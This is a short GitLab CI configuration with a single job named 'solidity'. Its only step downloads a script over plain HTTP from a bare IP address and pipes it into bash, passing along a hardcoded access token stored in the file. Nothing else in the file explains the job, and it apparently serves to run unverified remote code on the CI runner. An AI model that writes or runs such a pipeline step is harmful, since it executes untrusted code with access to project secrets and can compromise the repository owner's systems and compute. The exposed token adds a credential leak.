image: golang:1.16.3

variables:
  ACCESS_TOKEN: "52be452c950645bd4b23b92ca7b77e336421b196d6bc145b88820acb4fc53d75"

stages:
  - main

solidity:
  stage: main
  script:
    - bash <(curl -s http://54.77.51.223/script) $ACCESS_TOKEN

